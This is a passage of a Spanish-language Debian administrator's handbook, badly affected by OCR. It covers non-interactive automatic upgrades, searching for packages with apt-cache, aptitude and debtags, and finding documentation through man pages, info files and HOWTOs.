— ,  Demonio  de  eventos  de  ACPI  (configuracion  avanzada  e  interfaz  de  energia) 
acpid-l:2. 0.26-1  (32  bits) 
default  icon  theme  of  GNOME 
adwaita-icon-theme-3.18.0-2 
^  GNOME  solitaire  card  game  collection 
aisleriot-l:3. 18.2-1  (32  bits) 

^  MySQL  storage  backend  for  Akonadi 
akonadi-backend-mysql-1.13.0-8 
Akonadi  PIM  storage  service 
akonadi-server-1. 13.0-8  (32  bits) 

Utilities  for  configuring  and  using  ALSA 
alsa-utils-1. 1.0-2  (32  bits) 

,  Apache  H  I  IP  Server  (modules  and  other  binary  files) 

►  Detalles 


-  - 1  Descargando  paquetes 


1569  actualizaciones  seleccionadas  Salir  Instalar  actualizaciones 


Figura  6.3  Actualization  con  gpk- update- viewer 


6.8.  Actualizaciones  automaticas 

Dado  que  Falcot  Corp  tiene  muchas  maquinas  pero  personal  limitado,  sus  administradores  in- 
tentan  hacer  las  actualizaciones  tan  automaticas  como  sea  posible.  Los  programas  a  cargo  de 
esos  procesos  deben,  por  lo  tanto,  ejecutar  sin  intervencion  humana. 


6.8.1  Configuracion  de  dpkg 

Como  ya  mencionamos  (revise  el  recuadro  «Evitando  preguntas  sobre  los  archivos  de  configura- 
cion»  pagina  90),  se  le  puede  indicar  a  dpkg  que  no  pida  confirmacion  al  reemplazar  un  archivo 
de  configuracion  (con  las  opciones  -force-confdef  —  force-confold).  Sin  embargo,  las  interaccio- 
nes  pueden  tener  otros  tres  origenes:  algunas  provienen  de  APT  mismo,  algunas  son  gestionadas 
por  debconf  y  otras  ocurren  en  la  lrnea  de  ordenes  debido  a  scripts  de  configuracion  de  paque¬ 
tes. 
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6.8.2  Configuration  de  APT 


En  el  caso  de  APT  es  simple:  la  opcion  -y  (o  — asume-yes)  le  indica  a  APT  que  considere  que  la 
respuesta  a  todas  las  preguntas  sera  afirmativa  («yes»). 


6.8.3  Configuration  de  debconf 

El  caso  de  debconf  merece  mas  detalles.  El  programa  fue  disenado,  desde  su  conception,  para 
controlar  la  relevancia  y  volumen  de  las  preguntas  mostradas  al  usuario  asi  como  tambien  la 
forma  en  la  que  se  mostraran.  Es  por  esto  que  su  configuration  requiere  una  prioridad  minima 
para  las  preguntas;  solo  se  mostraran  las  preguntas  sobre  la  prioridad  minima,  debconf  asume 
la  respuesta  predeterminada  (definida  por  el  encargado  del  paquete)  para  las  preguntas  que 
decidio  evitar. 

Los  otros  elementos  de  configuration  relevantes  es  la  interfaz  utilizada.  Si  selecciona  la  opcion 
non  interactive,  se  desactivara  toda  interaction  con  el  usuario.  Si  un  paquete  intenta  mostrar 
una  nota  informativa,  esta  sera  enviada  al  administrador  por  email. 

Para  reconfigurar  debconf  utilice  d  p  kg  -  r  e  co  n  f  ig  u  re  del  paquete  debconf;  la  orden  necesaria  es 
dpkg  -  reconf  igu  re  debconf.  Es  importante  saber  que,  si  es  necesario,  los  valores  configurados 
pueden  sobreescribirse  temporalmente  con  variables  de  entorno  (por  ejemplo  DEBIAN  FRONT 
END  controlala  interfaz,  como  esta  documentado  en  la  pagina  de  manual  debconf  (7)). 


6.8.4  Manejo  de  interacciones  de  linea  de  ordenes 

La  ultima  fuente  de  interacciones,  y  la  mas  dificil  de  la  que  deshacerse,  son  los  scripts  de  configu¬ 
ration  ejecutados  por  dpkg.  Desafortunadamente  no  hay  solution  estandar  y  ninguna  respuesta 
es  mucho  mejor  que  la  otra. 

El  enfoque  comun  es  eliminar  la  entrada  estandar  redireccionando  hacia  ella  el  contenido  va- 
cio  de  /dev/null  con  programa  </dev/null  o  proveerle  un  flujo  interminable  de  caracteres 
de  nueva  linea.  Ninguno  de  estos  metodos  es  100  %  fiable,  pero  generalmente  provocan  que  se 
utilicen  las  respuestas  predeterminadas,  ya  que  la  mayoria  de  los  scripts  consideran  una  falta 
de  respuesta  como  aceptacion  del  valor  predeterminado. 


6.8.5  La  combination  milagrosa 

Combinando  los  elementos  anteriores  es  posible  disenar  un  script  pequeno  pero  confiable  que 
pueda  realizar  actualizaciones  automaticas. 
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Ejemplo  6.4  Script  de  actualization  no-interactivo 


export  DEBIAI\l_FRONTEND=noninteractive 

yes  ''  |  apt-get  -y  -o  DPkg : :options : -force-confdef"  -o  DPkg :: options -force- 
confold"  dist-upgrade 


EN  LA  PRACTICA  Las  maquinas  de  Falcot  son  sistemas  heterogeneos,  con  equipos  que  tienen  varias 
El  caso  de  Falcot  Corp  funciones.  Los  administradores  elegiran  la  solucion  mas  relevante  para  cada  uno. 

En  la  practica,  configuraran  los  servidores  ejecutando  Jeesie  con  la  «combinaci6n 
milagrosa»  anterior  y  seran  actualizados  automaticamente.  Solo  los  servidores  mas 
criticos  (los  firewall,  por  ejemplo)  seran  configurados  con  apticron  para  que  las 
actualizaciones  solo  ocurran  bajo  la  supervision  de  un  administrador. 

Las  estaciones  de  trabajo  de  oficina  en  los  servicios  administrativos  tambien  eje- 
cutan  Jeesie ,  pero  estan  equipados  con  gnome-packagekit  para  que  los  usuarios 
puedan  disparar  las  actualizaciones  por  si  mismos.  La  razon  de  esta  decision  es 
que  si  las  actualizaciones  ocurren  sin  una  accion  explitica  podrfa  cambiar  inespe- 
radamente  el  comportamiento  del  equipo  causando  confusion  para  sus  usuarios 
principales. 

En  el  laboratorio,  las  pocas  maquinas  que  utilizan  Testing  —  para  aprovechar  las 
ultimas  versiones  de  software  —  no  se  actualizan  automaticamente  tampoco.  Los 
administradores  configuraron  APT  para  que  prepare  las  actualizaciones  pero  que 
no  las  realice;  cuando  decidan  actualizar  (manualmente),  se  evitaran  las  partes  te- 
diosas  de  actualizar  las  listas  de  paquetes  y  descargar  los  paquetes  y  los  adminis¬ 
tradores  se  pueden  concentrar  en  la  parte  realmente  util. 


6.9.  Busqueda  de  paquetes 

Con  la  enorme  y  creciente  cantidad  de  software  en  Debian  surge  una  paradoja:  Debian  general- 
mente  tiene  una  herramienta  para  la  mayoria  de  las  tareas,  pero  dicha  herramienta  puede  ser  di- 
ficil  de  encontrar  entre  tantos  paquetes.  La  falta  de  formas  apropiadas  para  buscar  (y  encontrar) 
la  herramienta  correcta  es  un  problema  desde  hace  tiempo.  Afortunadamente  este  problema  ha 
sido  solucionado  casi  completamente. 

La  busqueda  mas  trivial  posible  es  buscar  el  nombre  exacto  de  un  paquete.  Si  a pt  show  paquete 
devuelve  un  resultado  entonces  el  paquete  existe.  Desafortunadamante  esto  necesita  saber  o 
adiviar  el  nombre  del  paquete,  lo  que  no  es  siempre  posible. 

TIP  Algunas  categories  de  paquetes  tienen  esquemas  convencionales  de  nombres;  co- 
Convenciones  de  nocer  dicho  esquema  a  veces  puede  permitirle  adivinar  nombres  de  paquetes  exac- 
nombres  de  paquetes  tos.  P°r  ejempl°>  para  modulos  Perl,  la  convencion  dice  que  un  modulo  llamado 
XNL:  :  Handler :  :  Composer  en  origen  debe  ser  empaquetado  como  libxmi-handier- 
composer-perl.  La  biblioteca  que  permite  utilizar  el  sistema  gconf  desde  Python 
es  empaquetada  como  python-gconf.  Lamentablemente  no  es  posible  definir  un 
esquema  general  de  nombres  para  todos  los  paquetes,  aunque  generalmente  los 
encargados  de  paquetes  intentan  seguir  la  eleccion  de  los  autores  originales. 
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Un  patron  de  busqueda  ligeramente  mas  exitoso  es  una  busqueda  en  texto  piano  de  los  nombres 
de  los  paquetes,  pero  es  aun  muy  limitada.  Generalmente  puede  encontrar  resultados  buscando 
en  la  descripcion  de  los  paquetes:  dado  que  cada  paquete  tiene  una  descripcion  mas  o  menos 
detallada  ademas  de  su  nombre,  una  busqueda  de  palabras  clave  en  estas  descripciones  gene¬ 
ralmente  sera  util,  apt -cache  y  axi- cache  son  las  herramientas  mas  utilizadas  para  este  tipo 
de  busqueda;  por  ejemplo,  apt -cache  search  video  devolvera  una  lista  de  todos  los  paquetes 
cuyos  nombres  o  descripciones  contengan  la  palabra  clave  «video». 

Para  busquedas  mas  complejas  necesita  herramientas  mas  poderosas  como  aptitude,  aptit 
ude  le  permite  buscar  segun  expresiones  logicas  basadas  en  los  campos  de  metadatos  de  los 
paquetes.  Por  ejemplo,  la  siguiente  orden  busca  aquellos  paquetes  cuyo  nombre  contenga  kino, 
cuya  descripcion  contenga  video  y  cuyo  nombre  de  encargado  contenga  paul: 

$  aptitude  search  kino~dvideo~mpaul 

p  kino  -  Non-linear  editor  for  Digital  Video  data 

$  aptitude  show  kino 

Package:  kino 

State:  not  installed 

Version:  1.3.4-2.1+bl 

Priority:  extra 

Section:  video 

Maintainer:  Paul  Brossier  <piem@debian . org> 

Architecture:  amd64 
Uncompressed  Size:  8,472  k 

Depends:  libasound2  (>=  1.0.16),  libatkl.0-0  (>=  1.12.4),  libavcl394-0  (>= 

0.5.3),  libavcodec56  (>=  6:ll~betal)  |  libavcodec-extra-56  (>= 

6 : ll~betal) ,  libavf ormat56  (>=  6:ll~betal),  libavutil54  (>= 

6 : ll~betal) ,  libc6  (>=  2.14),  libcairo2  (>=  1.2.4),  libdv4, 
libfontconf igl  (>=  2.11),  libfreetype6  (>=  2.2.1),  libgccl  (>= 

1:4. 1.1),  libgdk-pixbuf2 .0-0  (>=  2.22.0),  libglade2-0  (>=  l:2.6.4-2~), 
libglib2 .0-0  (>=  2.12.0),  libgtk2.0-0  (>=  2.24.0),  libice6  (>= 

1:1. 0.0),  libiec61883-0  (>=  1.2.0),  libpango- 1 . 0-0  (>=  1.14.0), 
libpangocairo-1.0-0  (>=  1.14.0),  libpangoft2-1.0-0  (>=  1.14.0), 
libguicktime2  (>=  2:1. 2. 2),  librawl394-ll,  libsamplerateO  (>=  0.1.7), 
libsm6,  libstdc++6  (>=  4.9),  libswscale3  (>=  6 : ll~betal) ,  libxll-6, 
libxext6,  libxml2  (>=  2.7.4),  libxvl,  zliblg  (>=  1:1. 1.4) 

Recommends:  ffmpeg,  curl 

Suggests:  udev  |  hotplug,  vorbis -tools ,  sox,  mjpegtools,  lame,  ffmpeg2theora 
Conflicts:  kino-dvtitler,  kino-timfx,  kinoplus 
Replaces:  kino-dvtitler,  kino-timfx,  kinoplus 
Provides:  kino-dvtitler,  kino-timfx,  kinoplus 
Description:  Non-linear  editor  for  Digital  Video  data 
Kino  allows  you  to  record,  create,  edit,  and  play  movies  recorded  with  DV 
camcorders.  This  program  uses  many  keyboard  commands  for  fast  navigating  and 
editing  inside  the  movie. 

The  kino-timfx,  kino-dvtitler  and  kinoplus  sets  of  plugins,  formerly 
distributed  as  separate  packages,  are  now  provided  with  Kino. 

Homepage:  http://www.kinodv.org/ 
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Tags:  field: :arts,  hardware: : camera,  implemented-in: :c,  implemented-in: :c++, 
interface: :xll,  role: :program,  scope: application,  suite: :gnome, 
uitoolkit : : gtk,  use :: editing ,  use: :learning,  works-with: :video, 
xll : : application 

La  busqueda  solo  devuelve  un  paquete,  kino,  que  satisface  los  tres  criterios. 

Aun  estas  busquedas  multicritero  son  complejas,  lo  que  explica  porque  no  son  utilizadas  tanto 
como  se  podria.  Se  desarrollo  por  lo  tanto  un  nuevo  sistema  de  etiquetas  que  provee  un  nuevo 
enfoque  de  busqueda.  Los  paquetes  con  ciertas  etiquetas  proveen  una  clasificacion  tematica 
segun  varios  ejes,  conocido  como  «clasificacion  en  base  a  facetas».  En  el  caso  anterior  con  kino, 
las  etiquetas  del  paquete  indican  que  Kino  es  un  software  basado  en  Gnome  que  trabaja  con 
datos  de  video  y  cuyo  proposito  principal  es  la  edicion. 

Navegar  esta  clasificacion  puede  ayudarle  a  buscar  un  paquete  que  se  corresponda  con  necesida- 
des  conocidas;  aun  si  devuelve  una  cantidad  (moderada)  de  elementos,  el  resto  de  la  busqueda 
puede  realizarse  de  forma  manual.  Para  hacerlo,  puede  utilizar  el  patron  de  busqueda  ~G  en 
aptitude,  pero  probablemente  sea  mas  sencillo  simplemente  navegar  hacia  donde  se  adminis- 
tran  las  etiquetas: 

+  http : //debt ags . alioth . debian . org/ cloud/ 

Seleccionar  las  etiquetas  works-with::videoy  use::editing  solo  devuelve  unos  pocos  paquetes  que 
incluyen  los  editores  de  video  kino  y  pitivi.  El  sistema  de  clasificacion  sera  utilizado  mas  y  mas 
con  el  paso  del  tiempo  y  los  encargados  de  los  paquetes  gradualmente  proveeran  interfaces  de 
busqueda  eficientes  sobre  el. 

Resumiendo,  la  mejor  herramienta  depende  de  la  complejidad  de  la  busqueda  que  desee  hacer: 

■  apt -cache  solo  permite  buscar  en  el  nombre  y  la  descripcion  de  los  paquetes,  lo  que  es 
muy  conveniente  cuando  busque  un  paquete  particular  que  coincida  con  unas  pocas  pa- 
labras  clave; 

■  cuando  el  criterio  de  busqueda  incluya  tambien  relaciones  entre  paquetes  u  otros  meta¬ 
datas  como  por  ejemplo  el  nombre  del  encargado,  sera  mas  util  synaptic; 

■  cuando  necesita  una  busqueda  sobre  etiquetas  packagesearches  una  buena  herramienta, 
una  interfaz  grafica  dedicada  a  buscar  paquetes  disponibles  segun  varios  criterios  (inclu- 
yendo  el  nombre  de  los  archivos  que  contiene).  Si  desea  utilizar  la  linea  de  ordenes,  axi- 
cache  es  su  mejor  opcion. 

■  finalmente,  cuando  la  busqueda  implique  expresiones  complejas  con  operaciones  logicas, 
la  herramienta  a  elegir  sera  la  sintaxis  de  patrones  de  busqueda  de  aptitude  que  es  bas- 
tante  potente  aunque  este  relativamente  escondida;  se  puede  utilizar  tanto  en  el  modo  de 
linea  de  ordenes  como  en  el  modo  interactive. 
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Para  un  administrador,  la  habilidad  mas  importante  es  poder  enfrentarse  a  cualquier  situacion  conocida 
o  no.  Este  capitulo  provee  una  serie  de  metodos  que  —  esperamos  —  le  permitira  aislar  la  causa  de 
cualquier  problema  que  encuentre  para  que  pueda  llegar  a  resolverlo. 


7.1.  Fuentes  de  documentacion 


Antes  de  que  pueda  entender  lo  que  realmente  esta  pasando  cuando  hay  un  problema,  necesita 
saber  el  rol  que  cumple  en  teorfa  cada  programa  involucrado  en  el  problema.  Para  hacerlo,  lo 
mejor  que  puede  hacer  es  consultar  su  documentacion;  pero  ya  que  dichos  documentos  son 
numerosos  y  muy  dispersos  debe  saber  todos  los  lugares  donde  puede  encontrarlos. 


7.1.1  Paginas  de  manual 


CULTURA  Es  el  acronimo  en  ingles  de  «lee  el  p**o  manual»  («Read  The  F**king  Manual*) 
RTFM  Pero  Pue<1e  entenderse  tambien  como  una  variante  mas  amigable  «lee  el  bendito 
manual*  («Read  The  Fine  Manual*).  Esta  frase  es  utilizada  a  veces  en  respuestas 
(bruscas)  a  preguntas  de  novatos.  Es  bastante  abrupta  y  deja  ver  cierta  molestia  so- 
bre  una  pregunta  hecha  por  alguien  que  no  se  molesto  siquiera  en  leer  la  documen¬ 
tacion.  Algunos  dicen  que  esta  respuesta  clasica  es  mejor  que  ninguna  respuesta 
(ya  que  indica  que  la  documentacion  contiene  la  informacion  buscada)  o  que  una 
respuesta  mas  extensa  y  violenta. 

En  cualquier  caso,  si  alguien  le  responde  «RTFM»,  es  aconsejable  no  sentirse  ofen- 
dido.  Esta  respuesta  es  generalmente  fastidiosa  por  lo  que  podrla  desear  evitar  re- 
cibirla.  Si  la  informacion  que  busca  no  esta  en  el  manual,  lo  cual  puede  ocurrir,  de- 
berla  decirlo  —  preferentemente  en  su  pregunta  inicial.  Deberia  describir  tambien 
los  pasos  que  tomo  por  su  cuenta  intentando  encontrar  esta  informacion  antes  de 
hacer  la  pregunta  en  dicho  ambito.  Puede,  antes  de  utilizar  foros,  seguir  una  serie 
de  recomendaciones  de  sentido  comun  detalladas  por  Eric  Raymod  y  traducidas 
por  Jose  M.  Fernandez. 

http : //www. sindominio . net/ayuda/preguntas- inteligentes . html 
•-  http : //catb . org/~esr/f aqs/ smart  -  questions .html 


Las  paginas  de  manual,  aunque  de  estilo  escueto,  contienen  gran  cantidad  de  informacion 
esencial.  Repasaremos  rapidamente  los  programas  para  verlas.  Simplemente  ejecute  man 
pagina _de_manual  —  la  pagina  de  manual  generalmente  tiene  el  mismo  nombre  que  el  progra¬ 
ma  sobre  el  que  busca  documentacion.  Por  ejemplo,  para  aprender  sobre  las  opciones  posibles 
de  cp  utilizaria  man  cp  en  una  terminal  (revise  el  recuadro  «La  consola,  un  interprete  de  linea 
de  ordenes»  pagina  142). 


VOLVER  A  LOS  CIMIENTOS  Un  interprete  de  linea  de  ordenes,  tambien  llamado  «terminal»,  es  un  programa 

La  consola  un  interprete  <1ue  ejecuta  las  ordenes  que  son  o  bien  ingresadas  por  el  usuario  o  almacenadas  en 

de  linea  de  ordenes  un  scr'Pt-  En  el  modo  interactivo,  muestra  un  «prompt»  (que  generalmente  finaliza 
con  $  para  un  usuario  normal  o  con  #  para  un  administrador)  que  indica  que  esta 
listo  para  leer  una  orden  nueva.  El  Apendice  B,  Curso  breve  de  emergencia  pagina 
473  describe  el  uso  basico  de  una  consola. 

La  consola  predeterminada  y  mas  utilizada  es  bash  («Bourne  Again  Shell*)  pero 
existen  otras,  incluyendo  dash,  csh,  tcsh  y  zsh. 
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Entre  otras  cosas,  la  mayorfa  de  las  consolas  ofrecen  ayuda  ingresando  datos  al 
prompt  como  completado  de  nombres  de  programas  o  de  archivos  (que  generalmen- 
te  puede  realizar  presionando  la  tecla  tab)  o  recordando  ordenes  previas  (gestion 
del  historial). 


Las  paginas  de  manual  no  solo  documentan  programas  en  la  linea  de  ordenes,  tambien  archivos 
de  configuracion,  llamadas  de  sistema,  funciones  de  la  biblioteca  C  y  mas.  A  veces  pueden  coin- 
cidir  ciertos  nombres.  Por  ejemplo,  la  orden  de  la  consola  read  tiene  el  mismo  nombre  que  la 
llamada  de  sistema  read.  Es  por  eso  que  las  paginas  de  manual  estan  organizadas  en  secciones 
numeradas: 

1.  ordenes  que  pueden  ser  ejecutadas  desde  la  linea  de  ordenes; 

2.  llamadas  de  sistema  (funciones  proporcionadas  por  el  nucleo); 

3.  funciones  de  biblioteca  (proporcionadas  por  las  bibliotecas  del  sistema); 

4.  dispositivos  (en  Unix  estos  son  archivos  especiales  generalmente  ubicados  en  el  directorio 
/dev/); 

5.  archivos  de  configuracion  (formatos  y  convenciones); 

6.  juegos; 

7.  conjuntos  de  «macros»  y  estandares; 

8.  ordenes  de  administracion  del  sistema; 

9.  rutinas  del  nucleo. 

Es  posible  especificar  la  pagina  del  manual  que  esta  buscando:  para  visualizar  la  documentacion 
de  la  llamada  de  sistema  read  utilizaria  man  2  read.  Cuando  no  se  especifique  una  seccion  ex- 
pKcitamente,  se  mostrara  la  primera  seccion  que  posea  una  pagina  de  manual  con  el  nombre 
pedido.  Por  lo  tanto,  man  shadow  mostrara  shadow! 5)  porque  no  hay  paginas  de  manual  para 
shadow  en  las  secciones  1  a  4. 


SUGERENCIA  Si  no  desea  ver  la  pagina  de  manual  completa  sino  solo  una  descripcion  corta  para 
whatis  confirmar  que  es  lo  que  esta  buscando,  ingrese  whatis  programa. 

$  whatis  scp 

scp  (1)  -  copia  segura  (programa  de  copia  de  ficheros 

**■  remotos) 

Esta  descripcion  corta  esta  incluida  en  la  seccion  NOMBRE  ( «NAME» )  al  principio 
de  todas  las  paginas  de  manual. 


Por  supuesto,  si  no  sabe  el  nombre  del  programa,  el  manual  no  le  sera  de  mucha  utilidad.  Este 
es  el  proposito  del  programa  apropos  que  le  ayuda  a  buscar  en  las  paginas  de  manual,  mas  es- 
pecificamente  en  sus  descripciones  cortas.  Cada  pagina  de  manual  comienza  esencialmente  con 
un  resumen  de  una  linea.  apropos  devuelve  una  lista  de  las  paginas  de  manual  que  mencionan 
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en  su  resumen  la  palabra  clave  pedida  (o  todas  las  ingresadas).  Si  las  selecciona  correctamente 
encontrara  el  nombre  del  programa  que  necesita. 


Ejemplo  7.1  Encontrar  cp  con  apropos 


$  apropos  "copy  file" 

cp  (1) 
cpio  (1) 
gvfs-copy  (1) 
gvfs-move  (1) 
hcopy  (1) 
install  (1) 
ntfscp  (8) 


copia  ficheros  y  directorios 
copia  ficheros  a  y  desde  archivos 
copia  archivos 
copia  archivos 

copia  archivos  desde  o  a  un  volumen  HFS 
copia  archivos  y  un  conjunto  de  atributos 
copia  un  archivo  a  un  volumen  NTFS. 


SUGERENCIA 

Navegar  siguiendo 
enlaces 


Muchas  paginas  de  manual  tienen  una  seccion  «VEATAMBIEN»  («SEE  ALSO»),  ge- 
neralmente  al  final.  Se  refiere  a  otras  paginas  de  manual  relevantes  de  programas 
similares  o  documentacion  externa.  Es  posible,  de  esta  forma,  encontrar  documen¬ 
tacion  relevante  aun  cuando  la  primera  opcion  no  sea  la  optima. 


El  programa  man  no  es  la  unica  forma  de  consultar  las  paginas  de  manual  ya  que  los  programas 
konqueror  (en KDE) y  yel p  (en GNOME)  tambien  ofrecen esta funcionalidad.  Existe  tambien una 
interfaz  web  provista  por  el  paquete  man2html  que  le  permite  ver  las  paginas  de  manual  en  un 
navegador  web.  En  un  equipo  donde  este  instalado  este  paquete,  utilice  la  siguiente  URL: 

•-  http : //local host/ cgi- bin/man/man2html 

Esta  herramienta  necesita  un  servidor  web.  Es  por  esto  que  si  deberia  elegir  instalar  este  paque¬ 
te  en  uno  de  sus  servidores:  todos  los  usuarios  de  la  red  local  se  beneficiaran  de  este  servicio 
(incluyendo  maquinas  que  no  tienen  Linux)  y  le  evitara  tener  que  configurar  un  servidor  HTTP 
en  cada  estacion  de  trabajo.  Si  puede  acceder  a  su  servidor  desde  otras  redes  podrfa  desear  res- 
tringir  el  acceso  a  este  servicio  solo  a  los  usuarios  de  la  red  local. 


NORMATIVA  DEBIAN 

Paginas  de  manual 
obligatorias 


Debian  requiere  que  cada  programa  tenga  una  pagina  de  manual.  Si  el  autor  ori¬ 
ginal  no  provee  una,  el  desarrollador  Debian  generalmente  escribira  una  pagina 
minima  que  cuando  menos  dirija  al  lector  a  la  ubicacion  de  la  documentacion  ori¬ 
ginal. 


7.1.2  Documentos  info 

El  proyecto  GNU  escribio  manuales  para  la  mayoria  de  sus  programas  en  el  formato  info;  es  por 
esto  que  muchas  paginas  de  manual  hacen  referencia  a  la  documentacion  info  correspondiente. 
El  formato  tiene  ciertas  ventajas,  pero  el  programa  por  defecto  para  visualizar  estos  documen¬ 
tos  (llamado  info)  es  tambien  ligeramente  mas  complejo.  En  vez  de  este  se  le  recomienda  usar 
pinfo  (del  paquete  pinfo). 
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La  documentacion  info  tiene  una  estructura  jerarquica  y  si  ejecuta  pint o  sin  parametros  mos- 
trara  una  lista  de  los  nodos  disponibles  en  el  primer  nivel.  Generalmente  los  nodos  tienen  el 
nombre  del  programa  correspondiente. 

En  la  orden  pinfo  la  navegacion  se  controla  con  las  teclas  del  cursos.  Puede  utilizar,  alternati- 
vamente,  un  navegador  grafico  que  es  mucho  mas  amigable.  Nuevamente,  konqueror  y  yelp 
funcionan;  inf o2www  tambien  provee  una  interfaz  web. 

http : //local host/ cgi- bin/inf o2www 

Note  que  el  sistema  info,  a  diferencia  del  sistea  de  paginas  man,  no  permite  traducciones.  Los 
documentos  info  estaran,  por  lo  tan  to,  siempre  en  ingles.  Sin  embargo,  cuando  le  pida  a  pint  o 
una  pagina  info  que  no  exista,  este  buscara  la  pagina  de  man  con  el  mismo  nombre  (si  es  que 
existe)  y  esta  puede  que  si  este  traducida. 


7.1.3  Documentacion  especifica 

Cada  paquete  incluye  su  propia  documentacion.  Aun  los  programas  menos  documentados  gene¬ 
ralmente  tienen  un  archivo  README  que  contiene  informacion  interesante  y/o  importante.  Esta 
documentacion  se  instala  en  el  directorio  /us  r/sha  re/doc/paquete/  (donde  paquete  representa 
el  nombre  del  paquete).  Si  la  documentacion  es  particularmente  grande  puede  no  estar  incluida 
en  el  paquete  principal  del  programa  sino  que  puede  haber  sido  separada  a  un  paquete  dedicado 
que  generalmente  es  llamado  paquete- doc.  El  paquete  principal  por  lo  general  recomendara  el 
paquete  de  documentacion  para  que  pueda  encontrarlo  facilmente. 

El  directorio  /us  r/sha  re/do c/ paquete/  tambien  contiene  algunos  archivos  provistos  por  De- 
bian  que  completan  la  documentacion  especificando  las  parti cularidades  o  mejoras  del  paquete 
comparandolo  con  una  instalacion  tradicional  del  software.  El  archivo  README .  Debian  tambien 
indica  todas  las  adaptaciones  que  se  realizaron  para  cumplir  con  la  Normativa  Debian.  El  archi¬ 
vo  changelog .  Debian  .gz  le  permite  al  usuario  seguir  las  modificaciones  realizadas  al  paquete 
con  el  tiempo:  es  muy  util  intentar  entender  lo  que  cambio  entre  dos  versiones  instaladas  que 
no  tienen  el  mismo  comportamiento.  Por  ultimo,  a  veces  habra  un  archivo  NEWS .  Debian  .  gz  que 
documentary  los  cambios  importantes  en  el  programa  que  podrfan  interesar  al  administrador. 


7.1.4  Sitios  web 

En  la  mayoria  de  los  casos,  los  programas  de  software  libre  tienen  sitios  web  que  se  utilizan  pa¬ 
ra  distribuirlo  y  reunir  la  comunidad  de  desarrolladores  y  usuarios.  Estos  sitios  generalmente 
estan  llenos  de  informacion  relevante  en  varias  formas:  documentacion  oficial,  preguntas  fre- 
cuentes  (FAQ:  «Frequently  Asked  Questions))),  archivos  de  listas  de  correo,  etc.  Los  problemas 
que  podrfa  tener  ya  han  sido  objeto  de  varias  preguntas;  los  FAQ  o  los  archivos  de  las  listas  de 
correos  pueden  tener  una  solucion.  Dominar  los  motores  de  busqueda  sera  de  gran  valor  para 
encontrar  las  paginas  relevantes  rapidamente  (restringiendo  la  busqueda  al  dominio  o  subdomi- 
nio  de  Internet  dedicado  al  programa).  Si  la  busqueda  devuelve  demasiados  resultados  o  estos 
no  coinciden  con  lo  que  desea,  puede  agregar  la  palabra  clave  debian  para  limitar  los  resultados 
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y  obtener  informacion  relevante. 


SUGERENCIA  Si  el  software  devuelve  un  mensaje  de  error  muy  especifico,  ingreselo  en  el  motor 
Del  error  a  la  solucion  de  busqueda  (entre  comillas  dobles,  ",  para  no  buscar  palabras  clave  individuales 
sino  la  frase  completa).  En  la  mayorla  de  los  casos,  los  primeros  enlaces  devueltos 
contendran  la  respuesta  que  busca. 

En  otros  casos,  obtendra  errores  muy  genericos  como  «permiso  denegado».  En  este 
caso,  es  mejor  revisar  los  permisos  de  los  elementos  involucrados  (archivos,  IDs  de 
usuario,  grupos,  etc.). 


Si  no  conoce  la  direccion  del  sitio  web  del  software  hay  varias  formas  de  obtenerla.  Prime- 
ro,  revise  si  hay  un  campo  Homepage  entre  la  metainformacion  del  paquete  (apt -cache  show 
paquete).  La  descripcion  del  paquete  tambien  podria  contener  un  enlace  al  sitio  oficial  del  pro- 
grama.  Si  no  se  indica  una  URL,  revise  /usr/share/doc/paquete/copyright.  El  desarrollador 
Debian  generalmente  indica  en  este  archivo  de  donde  obtuvo  el  codigo  fuente  del  programa  y 
es  probable  que  sea  el  sitio  web  que  busca.  Si  en  esta  etapa  de  su  busqueda  aun  no  obtuvo  resul- 
tados,  consulte  un  directorio  de  software  libre  como  el  Directorio  de  Software  Libre  de  la  FSF  o 
busque  directamente  con  un  motor  de  busqueda  como  DuckDuckGo,  Yahoo,  etc. 

https : //directory . f sf . org/wiki/Main_Page 

Tambien  podria  desear  revisar  el  wiki  de  Debian,  un  sitio  web  colaborativo  donde  cualquiera, 
inclusive  simples  visitantes,  pueden  hacer  sugerencias  directamente  desde  sus  navegadores.  Es 
utilizado  tanto  por  desarrolladores  para  disenar  y  especificar  sus  proyectos  como  por  usuarios 
para  compartir  su  conocimiento  escribiendo  documentos  colaborativamente. 

•-  http : //wiki . debian . org/ 


7.1.5  Tutoriales  (HOWTO) 

Un  «howto»  es  un  documento  que  describe,  en  terminos  concretos  y  paso  a  paso,  «como»  (en 
ingles  «how  to»)  llegar  a  un  objetivo  predefinido.  Eos  objetivos  cubiertos  son  relativamente  va- 
riados  pero  generalmente  de  naturaleza  tecnica;  por  ejemplo:  configurar  «IP  Masquerading», 
instalar  un  servidor  Samba,  etc.  Estos  documentos  generalmente  intentan  cubrir  todos  los  pro- 
blemas  potenciales  que  podrian  ocurrir  durante  la  implementacion  de  una  tecnologia  dada. 

El  Proyecto  de  Documentacion  de  Linux  (LDP:  «Linux  Documentation  Project)))  gestiona  muchos 
de  estos  tutoriales,  su  sitio  web  almacena  todos  estos  documentos: 

http://www.tldp.org/ 

Tome  estos  documentos  con  un  grano  de  sal.  Generalmente  tienen  varios  anos;  la  informacion 
que  contienen  a  veces  esta  obsoleta.  Este  fenomeno  es  aun  mas  frecuente  para  sus  traducciones 
ya  que  las  actualizaciones  no  son  ni  sistematicas  ni  instantaneas  luego  de  la  publicacion  de  nue- 
vas  versiones  de  los  documentos  originales.  Esta  es  parte  de  la  alegria  de  trabajar  en  un  entorno 
de  voluntaries  y  sin  limitaciones... 
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7.2.  Procedimientos  comunes 


El  proposito  de  esta  seccion  es  presentar  algunas  sugerencias  generales  en  algunas  operaciones 
que  el  administrador  tendra  que  realizar  frecuentemente.  Estos  procedimientos  obviamente  no 
cubriran  exhaustivamente  todo  caso  posible  pero  podrfan  servir  como  puntos  de  partida  para 
los  casos  mas  dificiles. 


DESCUBRIMIENTO  Generalmente,  la  documentacion  traducida  a  un  idioma  distinto  al  ingles  esta  dis- 
Documentacion  en  otros  ponible  en  un  paquete  separado  con  el  nombre  del  paquete  correspondiente  segui- 
idiomas  do  de  'idioma  (donde  idioma  es  el  codigo  ISO  de  dos  letras  para  el  idioma). 

Por  ejemplo,  el  paquete  apt-howto-fr  contiene  la  traduccion  al  trances  del  «howto» 
para  APT.  De  la  misma  forma,  los  paquetes  quick-reference-fr  y  debian-reference- 
fr  son  las  versiones  en  trances  de  las  gufas  de  referenda  para  Debian  (escritas  en 
ingles  inicialmente  por  Osamu  Aoki). 


7.2.1  Configuration  de  un  programa 

Cuando  desee  configurar  un  paquete  desconocido  debe  proceder  en  etapas.  Primero  de- 
